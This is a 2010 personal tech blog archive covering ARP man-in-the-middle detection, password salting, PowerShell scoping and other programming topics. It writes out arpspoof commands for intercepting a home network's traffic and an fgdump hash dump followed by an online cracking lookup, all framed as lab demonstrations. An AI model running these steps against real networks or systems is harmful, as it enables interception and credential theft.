Saturday, January 30, 2010

Using tshark to find the man in the middle

This post is targeted at people who understand IP addresses and default gateways and have heard of ARP, but don’t play with them often enough to realize how vulnerable we are to man-in-the-middle attacks.

Back in the old days, the network hardware was often a hub, and hubs had the property that every computer connected to a hub could see every other computer's traffic. This meant that if my computer and tori-the-lori were on the same hub, tori-the-lori could see all my network traffic. This sounds like weak security. In time the world invented switches, and now almost all networking uses switches. Switches differ from hubs in that computers only see traffic that is sent to them, not everyone's traffic. This difference should fix the weak security, right? Well, as with most things in security, the devil is in the details. Let's dig in.

When a computer wants to talk to another computer by IP address, it needs to find the MAC address for that IP address. This is done via ARP. Let's have a look at my home network.

Background info:
    My machine is @  192.168.1.101
    Tori-The-Lori is another machine in my network @ 192.168.1.100
    My default gateway is @ 192.168.1.1

 C:\Users\igord>ipconfig | findstr 192.168.1.1 
IPv4 Address. . . . . . . . . . . : 192.168.1.101
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Users\igord>ping -4 tori-the-lori
Pinging tori-the-lori [192.168.1.100] with 32 bytes of data:


Q: How does my machine know where to find 192.168.1.100?

A: 192.168.1.100 has a MAC address. MAC addresses are stored in the ARP table, so let's look at the ARP table:



PS C:\> arp -a | findstr 192.168.1.100 
192.168.1.100 00-22-5f-7e-f5-79 dynamic


Q: Can I erase that entry from  ARP table?


A:  Yup



PS C:\> arp -d 192.168.1.100
PS C:\> arp -a | findstr 192.168.1.100


Q: If I delete the ARP entry how will my machine find 192.168.1.100 again?

A: Let's watch ARP traffic in tshark :)



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp"
Capturing on Microsoft
7.202265 IntelCor_2f:5a:22 -> Broadcast ARP Who has 192.168.1.100? Tell 192.168.1.101
7.207136 LiteonTe_7e:f5:79 -> IntelCor_2f:5a:22 ARP 192.168.1.100 is at 00:22:5f:7e:f5:79
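
Those two lines are a broadcast ARP request and the unicast reply. As a rough sketch of what the request actually carries, here is the 28-byte ARP payload for IPv4 over Ethernet, packed with Python's struct module. The helper name build_arp_request is made up for illustration, and the addresses are the ones from the capture above; this only builds the bytes, it doesn't send anything.

```python
import socket
import struct

def build_arp_request(sender_mac, sender_ip, target_ip):
    """Pack the 28-byte ARP payload of a who-has request (illustrative helper)."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                                           # hardware type: Ethernet
        0x0800,                                      # protocol type: IPv4
        6,                                           # MAC address length in bytes
        4,                                           # IPv4 address length in bytes
        1,                                           # opcode: 1 = request, 2 = reply
        bytes.fromhex(sender_mac.replace(":", "")),  # "Tell" MAC
        socket.inet_aton(sender_ip),                 # "Tell" IP
        b"\x00" * 6,                                 # target MAC: unknown, that's the question
        socket.inet_aton(target_ip),                 # "Who has" IP
    )

packet = build_arp_request("00:21:6a:2f:5a:22", "192.168.1.101", "192.168.1.100")
print(len(packet), packet.hex())
```

Notice there is nothing in the packet that proves who sent it, which is what the rest of this post takes advantage of.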


Q: How does my machine get a packet to bing?


A: My machine uses DNS to get the IP address, then my machine uses the default gateway (192.168.1.1) to send the packet to bing(69.31.112.153).



Pinging a134.g.akamai.net [69.31.112.153] with 32 bytes of data:
Reply from 69.31.112.153: bytes=32 time=50ms TTL=54


Back in Wireshark:



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst
Capturing on Microsoft
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.153
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.153 192.168.1.101


Notice that the MAC address on the other end of the packets to and from bing's IP address belongs to my default gateway:



PS C:\Program Files (x86)\Wireshark> arp -a  | findstr 192.168.1.1
Interface: 192.168.1.101 --- 0xe
192.168.1.1 00-08-54-87-86-9c dynamic


Q: Can someone evil say  they are 192.168.1.1?



A: Yup. With these commands I can transform my happy Linux laptop into an evil man in the middle:



#enable routing 
vmplanet@ubuntu-vm:~$ sudo sysctl -w net.ipv4.ip_forward=1

# tell 101 I’m really the default gateway.
vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.101 192.168.1.1 > /dev/null

#tell the default gateway I’m really 101.
vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.1 192.168.1.101 > /dev/null


Q: What do I see on my windows box?



A: I wouldn’t be looking, but if you were you’d see this:



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp or icmp"
Capturing on Microsoft
0.697050 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
1.997779 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
2.698765 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
3.022153 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
3.584377 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
4.699856 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22
4.765403 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
6.445970 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
6.555464 192.168.1.103 -> 192.168.1.1 ICMP Redirect (Redirect for host)
6.653009 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)


Or maybe this:



PS C:\Program Files (x86)\Wireshark> arp -a | findstr 192.168.1.1
Interface: 192.168.1.101 --- 0xe
192.168.1.1 00-21-6a-2f-5a-22 dynamic
192.168.1.100 00-22-5f-7e-f5-79 dynamic
192.168.1.103 00-21-6a-2f-5a-22 dynamic


What the heck?  192.168.1.103 has now hijacked my ARP entry for the default gateway (compare to what 192.168.1.1 was above)
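
The giveaway in that table is two different IP addresses sharing one MAC address. Here is a minimal Python sketch that flags this, assuming the Windows `arp -a` output format shown above; the function name find_shared_macs is made up. It only looks at dynamic entries, since static broadcast and multicast entries legitimately share MAC addresses.

```python
import re
from collections import defaultdict

# Matches lines like: 192.168.1.1 00-21-6a-2f-5a-22 dynamic
ARP_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)"
)

def find_shared_macs(arp_output):
    """Return {mac: [ips]} for every MAC claimed by more than one dynamic entry."""
    ips_by_mac = defaultdict(list)
    for line in arp_output.splitlines():
        match = ARP_LINE.match(line)
        if match:
            ip, mac, kind = match.groups()
            if kind == "dynamic":
                ips_by_mac[mac.lower()].append(ip)
    return {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}

sample = """Interface: 192.168.1.101 --- 0xe
192.168.1.1 00-21-6a-2f-5a-22 dynamic
192.168.1.100 00-22-5f-7e-f5-79 dynamic
192.168.1.103 00-21-6a-2f-5a-22 dynamic"""

print(find_shared_macs(sample))
```

A shared MAC isn't proof of an attack (one machine can own several addresses), but the default gateway sharing a MAC with some other host is worth a second look.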



Unfortunately, when I ping bing.com things still look right:



Pinging a134.g.akamai.net [69.31.112.82] with 32 bytes of data:
Reply from 69.31.112.82: bytes=32 time=37ms TTL=54

PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp"
Capturing on Microsoft
5.758262 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
5.794958 69.31.112.82 -> 192.168.1.101 ICMP Echo (ping) reply
6.760151 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
11.304182 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
16.304111 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request


But when we look closely, at the MAC addresses, we realize all our packets go to the man in the middle :(



PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst -e icmp
Capturing on Microsoft
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp
00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp
00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp
00:21:6a:2f:5a:22 00:21:6a:2f:5a:22 192.168.1.101 69.31.112.106 icmp


Now that I’ve shown you how easy it is to become a man in the middle you should be thinking about what you are doing so the man in the middle can’t see you.

Saturday, January 23, 2010

The whitespace and indentation debate

Nothing annoys me more than having to argue over whitespace and indentation. Where should we stick the braces? Spaces vs Tabs? Can't we find something more useful to argue over?

Long ago I read that the only way to end the pointless whitespace debate is to have the compiler reject random whitespace. I thought that was a very good idea, and today I'll talk about it.

In the beginning whitespace didn't matter. It was there for the human, and the program ignored it. But that caused an annoying problem: you ended up needing tokens like '{' ';' and '(' and then you needed to argue about how you arranged the code around those tokens. For example:

ProcessIncomingDogs(List<Dog> dogs)
{
    ...
    if (dogs>1)
    {
        RunAway(smallDogs,speed.Fast);
        Log("SmallDogs Ran Away Fast");
    }
    Log("EveryOne Ran Away that needed to");
    ...
}


I'm happy to say we're making progress: Python gets rid of the annoying braces and denotes blocks via whitespace instead. As a result many Python programmers feel that Python looks like pseudocode. For example:



def ProcessIncomingDogs(dogs):
    ...
    if dogs>1:
        RunAway(smallDogs,speed.Fast)
        Log("SmallDogs Ran Away Fast")
    Log("EveryOne Ran Away that needed to")
    ...


This is good, but there is an annoying problem with Python. Which whitespace will you use? Spaces or tabs? Since whitespace carries meaning, mixing spaces and tabs creates real Python bugs.
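
To see how real the problem is, here is a small sketch, assuming Python 3, which refuses an ambiguous mix of tabs and spaces with a TabError. The helper name mixes_tabs_and_spaces and the two sample snippets are made up for illustration.

```python
def mixes_tabs_and_spaces(source):
    """Return True if Python 3 rejects the source for inconsistent indentation."""
    try:
        compile(source, "<demo>", "exec")
    except TabError:
        return True
    return False

# The first body line is indented with a tab, the second with eight spaces.
mixed = "if True:\n\tx = 1\n        y = 2\n"
# Both body lines are indented with four spaces.
consistent = "if True:\n    x = 1\n    y = 2\n"

print(mixes_tabs_and_spaces(mixed))
print(mixes_tabs_and_spaces(consistent))
```

In an editor both versions can look identical, which is exactly why this is such an annoying class of bug.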



I was very excited to discover that F#, which also relies heavily on whitespace, does not allow tabs for whitespace. I'm thrilled!  Finally the whitespace debate is over in F#. Hopefully more languages will follow F#'s lead. For example:



let ProcessIncomingDogs dogs =
    ...
    if dogs > 1 then
        RunAway smallDogs speed.Fast
        Log "SmallDogs Ran Away Fast"
    Log "EveryOne Ran Away that needed to"
    ...


By the way, if you are lucky enough to use C#, an excellent way to enforce consistent coding is StyleCop. It has a sane set of rules and decent tooling. For example, the StyleCop for ReSharper plugin can auto-correct as you type to fit the StyleCop coding convention.



May you never have to waste your life arguing over whitespace and indentation again!

Friday, January 15, 2010

Salting your hash, chasing rainbows and cracking passwords

Henry Ford takes 3 of his division presidents out for dinner to decide which of them will be the new CEO. As soon as they start eating Mr. Ford chooses Bob, the man to his left, to be the new CEO. The other division presidents are shocked, and ask why Bob was picked over them. Henry replies: Bob was the only man who tasted his food before salting it.

Unlike at dinner time, hashes should always be salted. A hash is a one-way function that maps something, for this discussion a password, to a short string. The point of a hash is that if you're given the hash, you can't figure out the password. A common scenario for hashes is checking users' passwords. Instead of storing a user's password and checking that the passwords match, you store the hash of the user's password, and make sure a hash of the password the user supplies matches the hash you stored. The advantage of storing the hash is that if someone steals your disk they don't get your users' passwords.

There's a rub though. What happens if two users have the same password? Then both passwords will have the same hash. Uh-oh, now we know if multiple users have the same password. This is bad! Now let's say I'm a bad guy and compute the hashes for all the common passwords ahead of time. This is called a dictionary attack. You might be asking yourself if a dictionary attack is feasible: how much space is needed to store said dictionary? A hash is usually 20 bytes; to make the math easier let's assume it's only 16 (2^4) bytes. Let's make a dictionary for an 8 character password; each character can be an uppercase letter, a lowercase letter or a digit, so there are (26+26+10) = 62 (~ 2^6) choices per character, across 8 (2^3) characters.

= (2^6)^8 * 2^4 bytes

= 2^48 passwords * 2^4 bytes storage for hash.

= 2^52 bytes for storage

~ 4,000 TB for storage.
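
If you want to check the arithmetic, here is a quick Python sketch of the same estimate, using the same assumptions as above (62 possible characters, 8 characters, 16 bytes per hash). It computes both the rounded power-of-two figure and the exact one; the variable names are mine.

```python
ALPHABET = 26 + 26 + 10   # uppercase + lowercase + digits = 62
LENGTH = 8                # characters in the password
HASH_BYTES = 16           # simplified hash size assumed in the text

exact_passwords = ALPHABET ** LENGTH      # 62^8
approx_passwords = (2 ** 6) ** LENGTH     # rounding 62 up to 64 gives 2^48

exact_bytes = exact_passwords * HASH_BYTES
approx_bytes = approx_passwords * HASH_BYTES   # 2^52

TIB = 2 ** 40
print("approx: %d TiB" % (approx_bytes // TIB))
print("exact:  %.0f TiB" % (exact_bytes / TIB))
```

Rounding 62 up to 64 overstates things a little (the exact figure comes out a bit under 3,200 TiB), but either way it is thousands of terabytes.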

This is really big, and clearly not feasible. Fortunately for attackers there is a trick you can play called a rainbow table. A rainbow table is a time-space trade-off algorithm where you do a lot of upfront computation to cut down on the amount of storage the dictionary requires. This technique is very effective. The rainbow table for Vista for the 8 character password I describe in this blog post is only 153 GB and you can buy it here.

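To defend against rainbow table attacks, we add salt. Before hashing the password, you prepend some random bytes, which we call salt. Then you store the salt alongside the hash. To verify the user's password you prepend the stored salt to the password the user supplied, hash the result, and check for a match. Because every user gets a different salt, two users with the same password no longer share a hash, and a table precomputed without the salt is useless.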
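
Here is a minimal Python sketch of that scheme, following the description literally: random salt, prepend, hash, store both. The function names, the 16-byte salt size and the choice of SHA-256 are my assumptions for illustration. A real system would want a deliberately slow function such as hashlib.pbkdf2_hmac rather than a single fast hash.

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Return (salt, digest); a fresh random salt is generated when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    return salt, digest

def verify_password(password, salt, stored_digest):
    """Re-hash the supplied password with the stored salt and compare."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored_digest)

# Two users pick the same password but end up with different stored hashes.
salt_a, hash_a = hash_password("dogfood")
salt_b, hash_b = hash_password("dogfood")
print(hash_a != hash_b)
print(verify_password("dogfood", salt_a, hash_a))
print(verify_password("catfood", salt_a, hash_a))
```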

This rainbow table attack can be used against my windows box – watch this:

1) create a user account with password dogfood.

c:\temp>net user sillyuser dogfood /add
The command completed successfully.

2) Dump the password hash using a tool called fgdump.

c:\temp>c:\bin_drop\fgdump.exe >junk

c:\temp>findstr sillyuser *
127.0.0.1.pwdump:sillyuser:1006:NO PASSWORD*********************:72B76234CCC8E047C6D12F2E391F5DF7:::


3) Lookup hashes for your password on a helpful website: http://lmcrack.com/index.php



ASCII : dogfood 
Hex. : 646f67666f6f64
LM : 655C44FFBF761281AAD3B435B51404EE
NTLM :72B76234CCC8E047C6D12F2E391F5DF7
MD5 : 5D6423C4CCDDCBBDF0FCFAF9234A72D0
MD4 : E840B5EB9173B2E137AB14A98742A285
SHA1 : 67A2C23E0AEF5D92CBE084E22AA8E9A9311322C8
SHA256 : E674F78D2BF55FD93C878F7FE14448ABE677E7C3160F820AC6A012E457520B81


4) Clean up



c:\temp>net user /delete sillyuser
c:\temp>del *.*
The command completed successfully.

Thursday, January 14, 2010

How do you thumbprint a certificate?

You often use thumbprints to find certificates, but what is the thumbprint?  The thumbprint is the hash of the certificate. In the case of the CLR’s X509Certificate2 class, the thumbprint is the SHA1 hash of the certificate. If you want to compute the thumbprint of a certificate yourself it’s pretty simple:

 
function get-CertThumbprint ($cert)
{
    $sha = new-object System.Security.Cryptography.SHA1CNG
    $hashOfRawBytesOfCertificate = $sha.ComputeHash($cert.RawData)
    # X2 pads every byte to two hex digits; plain X drops leading zeros (08 becomes 8).
    ( $hashOfRawBytesOfCertificate | % {"{0:X2}" -f $_} ) -join ""
}


 
PS cert:\LocaLMachine\My> dir


Directory: Microsoft.PowerShell.Security\Certificate::LocaLMachine\My


Thumbprint Subject
---------- -------
3BCA8A25A071300BD177E4C73135E54FA830039A CN=STS
08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533 CN=localhost

PS cert:\LocalMachine\My> $cert = get-item 08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533
PS cert:\LocalMachine\My> $cert.Thumbprint
08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533
PS cert:\LocalMachine\My> get-CertThumbprint $cert
08766D8B3DCDE5D633ED06AB1CB4DF4CCAECA533


If you’re wondering why you don’t use the subject name to identify a certificate, it’s because you can have lots of certificates with the same subject name.
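
For comparison, here is a rough Python sketch of the same computation. It assumes you already have the certificate's raw DER bytes in hand; the function names are mine. The one thing to get right is formatting every byte as exactly two hex digits, otherwise any byte below 0x10 loses its leading zero and the thumbprint comes out too short.

```python
import hashlib

def thumbprint(raw_cert_bytes):
    """SHA1 of the raw certificate bytes as 40 uppercase hex characters."""
    digest = hashlib.sha1(raw_cert_bytes).digest()
    return "".join(format(byte, "02X") for byte in digest)

def unpadded_hex(data):
    """The buggy variant: no zero padding, so 0x08 becomes '8'."""
    return "".join(format(byte, "X") for byte in data)

sample = bytes([0x08, 0x76, 0x6D, 0x06])
print("".join(format(b, "02X") for b in sample))  # 08766D06
print(unpadded_hex(sample))                        # 8766D6
print(len(thumbprint(b"any bytes will do here")))  # 40
```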

Sunday, January 10, 2010

A better blog editor - Windows Live Writer

I've been complaining about the blogger online blog editor forever. Today I took Windows Live Writer out for a spin and I like it. It's free, and it works with blogger without a hitch. My favorite feature is its preview pane which shows an actual preview of your post in the blog, which the blogger editor doesn't do at all.

In my heart of hearts I’ve always believed a rich client application should be more powerful than a web application, and in this case it is.

Saturday, January 9, 2010

Keyboard shortcuts in Windows WYSIWYG editors

I have a day job, and in that job I use Word, OneNote and Outlook.  For style I only use bold, italics, underline, headings 1-3 and lists. For some reason, I never learned the keyboard shortcuts for some of these, and thus I need the mouse to apply these styles. In case you suffer like me, here are the shortcuts that will set your mouse free.

Style            Word     OneNote
Heading 1        C-A-1    C-A-1
Heading N        C-A-N    C-A-N
Bulleted List    C-S-L    C-.
Numbered list    ?        C-/
Underline        C-U      C-U
Italics          C-I      C-I
Bold             C-B      C-B

Powershell is dynamically scoped, and that will confuse you.

Let's start with an example, as the concept of dynamic scoping is a big stretch for most programmers.

Python Program
x = 5
def printX():
    print(x)
def setAndprintX():
    x = 7
    printX()
printX()
setAndprintX()
printX()





Output From Python




5
5
5

Powershell Program




$x = 5
function printX() { echo $x }
function setAndprintX()
{
    $x=7
    printX
}
printX
setAndprintX
printX





Output From Powershell




5
7
5








What is this dynamic scoping?


Most programming languages use static, also called lexical, scoping because it's easy to understand. You figure out what is in scope by looking at the source code. In the Python example, the only value of x in scope inside printX is the global value of x.







By contrast, PowerShell uses dynamic scoping. In this model, you look up variables at runtime based on a scope stack. Each time you call a function you create a new scope that can see all the values from the calling scope. In the PowerShell example, when printX is called from setAndprintX we get the value of $x that was set in setAndprintX's scope.
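
One way to picture the scope stack is a list of dictionaries, searched from the innermost scope outward. The Python sketch below simulates that and reproduces the 5, 7, 5 output. It is a toy model under my own assumptions (the DynamicScopes class and its methods are made up), not a description of how PowerShell is actually implemented.

```python
class DynamicScopes:
    """Toy model of dynamic scoping: a stack of name -> value dictionaries."""

    def __init__(self):
        self.stack = [{}]                 # the global scope

    def set(self, name, value):
        self.stack[-1][name] = value      # writes land in the current scope

    def get(self, name):
        for scope in reversed(self.stack):   # innermost scope first
            if name in scope:
                return scope[name]
        raise NameError(name)

    def call(self, func):
        self.stack.append({})             # every call pushes a new scope
        try:
            return func()
        finally:
            self.stack.pop()              # and pops it on the way out

scopes = DynamicScopes()
output = []

def print_x():
    output.append(scopes.get("x"))

def set_and_print_x():
    scopes.set("x", 7)                    # visible to anything called from here
    scopes.call(print_x)

scopes.set("x", 5)
scopes.call(print_x)
scopes.call(set_and_print_x)
scopes.call(print_x)
print(output)  # [5, 7, 5]
```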






Why would you want dynamic scoping?



I can't come up with a good explanation of why you'd pick dynamic scoping over lexical scoping. My hunch is that it's historical, as it's how batch files and shell scripts work. Interestingly, Perl supports both dynamic scoping and lexical scoping. You can read a good article about it here. My synopsis, from the article, of why Perl has dynamically scoped variables:









  • In the beginning Perl only supported global variables, and that was painful.
  • Since it was cheap to implement, the Perl authors added the ability to create dynamically scoped variables (via the local keyword).
  • However, when the Perl authors got time, they added lexically scoped variables (via the my keyword).
  • Now people are told *not* to use dynamically scoped variables since they're weird.






Are there other language features that make this easier to work with?


Yes, you can write to a different scope explicitly:




$x = 3 # Write to local scope
$global:x = 3 # Write to global scope.





You can also execute your function without creating a new scope via '.' aka sourcing:




. func # runs the function in local scope, and variables created are visible.





This is fascinating, but why are we having this conversation?


Because I wanted to write:




function getPrintDogFunction()
{
    function Nested1(){echo "dog"}
    function Nested2(){Nested1}
    Get-Command Nested2
}

$printDog = getPrintDogFunction
# Call PrintDog
& $printDog

# This call fails, saying it can't find Nested1, which makes sense: it's not in scope.

So, I changed my code to the following:




# source getPrintDogFunction, which causes Nested1 and Nested2 to be created in my scope, and thus
# Nested1 is in scope when I call printDog

$printDog = . getPrintDogFunction
# Call $printDog
& $printDog





A few days pass, and I add a new feature, printCat. Via the power of cut and paste our code becomes:




function getPrintDogFunction()
{
    function Nested1(){echo "dog"}
    function Nested2(){Nested1}
    Get-Command Nested2
}

function getPrintCatFunction()
{
    function Nested1(){echo "cat"}
    function Nested2(){Nested1}
    Get-Command Nested2
}

$printDog = . getPrintDogFunction
$printCat = . getPrintCatFunction

# Print all the animals
& $printDog
& $printCat

# Grrr - this is printing cat cat.
# Worse yet depending on the order of these calls, the behavior changes.





To fix I use the following pattern:




function getPrintCatFunction()
{
    function Nested2()
    {
        function Nested1(){echo "cat"}
        Nested1
    }
    Get-Command Nested2
}

$printCat = getPrintCatFunction




And now the world makes sense.



Notes:


(1) If you've never heard of dynamic scoping, that's because almost any language you pick will act the same as the Python example.

Sunday, January 3, 2010

Syntax Highlighting Take 2

Readers of my blog complained that they can't see the code I had syntax highlighted when using RSS readers like Google Reader. The reason is moderately interesting so I'll explain it:



HTML likes to gobble up white space, so if you're pasting in source code you use the PRE (preformatted text) tag. PRE shows up in a fixed width font and preserves spacing; however you can't place < or > in PRE tags since they denote HTML tags. Instead you need to use &lt; or &gt; (character entity references, if you speak techno babble). This is annoying, especially given that the blogger text editor gets confused when you edit PRE tags with nested < and > signs.
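
If you'd rather not do that escaping by hand, it is easy to script. Here is a small Python sketch using the standard library's html.escape; the sample line of source code is made up.

```python
import html

source_line = 'if (x < 99 && y > 1) { print("ok"); }'

# quote=False leaves " alone; <, > and & become character entity references.
escaped = html.escape(source_line, quote=False)

print("<pre>" + escaped + "</pre>")
```

Note that & has to be escaped too (as &amp;), otherwise a literal &lt; in your source code would be displayed as <.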



Speaking of < and >, source code, and HTML files, you often want to write javascript in an HTML file, and you then hit the similar problem that you want to write x < 99, but can't since '<' isn't valid HTML. To solve this problem you can put a CDATA(*) section in your script blocks, which allows you to write x < 99.



So, to avoid having to escape > and <, the author of SyntaxHighlighter came up with a clever solution: put the source code you'd like to display in a non-javascript script block using CDATA, and then use javascript on the page to convert these blocks to tables for the web browser to display.



This works great in your web browser, but RSS readers don't run the javascript that converts the dummy script blocks into tables and thus you can't see the code.  



Luckily, SyntaxHighlighter also supports a usage where you specify your code in PRE blocks.  It's more annoying for me (for the above reasons), but it's better for my beloved readers since the PRE elements 'degrade' to non syntax highlighted pre blocks (instead of nothing) when in an RSS reader.





For all my RSS reader friends here is the snippet from the last blog post:



Console.Writeline("Hello World!")
Python:

print "Hello World"




NOTES:



(*) CDATA, aka character data, is not interpreted as part of the document.  In CDATA,  >  means greater than and does not have to be written as a character entity reference. Unfortunately CDATA cannot be placed in PRE blocks.